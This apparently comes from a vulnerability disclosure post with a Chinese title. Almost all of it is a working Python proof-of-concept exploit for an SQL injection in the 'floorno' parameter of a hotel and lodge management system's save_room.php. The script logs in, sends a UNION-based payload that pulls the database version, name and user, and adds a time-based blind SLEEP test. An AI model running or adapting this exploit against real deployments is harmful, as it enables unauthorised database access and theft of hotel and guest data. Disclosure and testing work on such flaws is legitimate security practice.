CVE-2025-11399：SourceCodester酒店管理系统SQL注入漏洞

# CVE-2025-11399 - SourceCodester Hotel and Lodge Management System SQL Injection PoC # Vulnerability Location: /pages/save_room.php # Vulnerable Parameter: floorno import requests # Target configuration TARGET_URL = "http://target-site.com" LOGIN_URL = f"{TARGET_URL}/login.php" SAVE_ROOM_URL = f"{TARGET_URL}/pages/save_room.php" # Attacker credentials (low privilege account required) USERNAME = "test_user" PASSWORD = "test_password" # Create session to maintain cookies session = requests.Session() # Step 1: Login to obtain authenticated session login_data = { "username": USERNAME, "password": PASSWORD } session.post(LOGIN_URL, data=login_data) # Step 2: Craft SQL injection payload for floorno parameter # Example: UNION-based injection to extract database version sql_payload = "1' UNION SELECT 1,version(),database(),user(),5,6,7-- -" # Step 3: Send malicious request to trigger SQL injection injection_data = { "floorno": sql_payload, # Additional parameters as required by the application "roomno": "101", "roomtype": "Standard", "price": "100", "status": "Available" } response = session.post(SAVE_ROOM_URL, data=injection_data) # Step 4: Analyze response for extracted data print("Status Code:", response.status_code) print("Response Body:", response.text) # Alternative: Time-based blind injection test time_based_payload = "1' AND SLEEP(5)-- -" time_data = { "floorno": time_based_payload, "roomno": "101" } import time start_time = time.time() session.post(SAVE_ROOM_URL, data=time_data) elapsed_time = time.time() - start_time if elapsed_time >= 5: print(f"[+] Time-based SQL injection confirmed! Elapsed: {elapsed_time}s") else: print(f"[-] No time delay detected. Elapsed: {elapsed_time}s")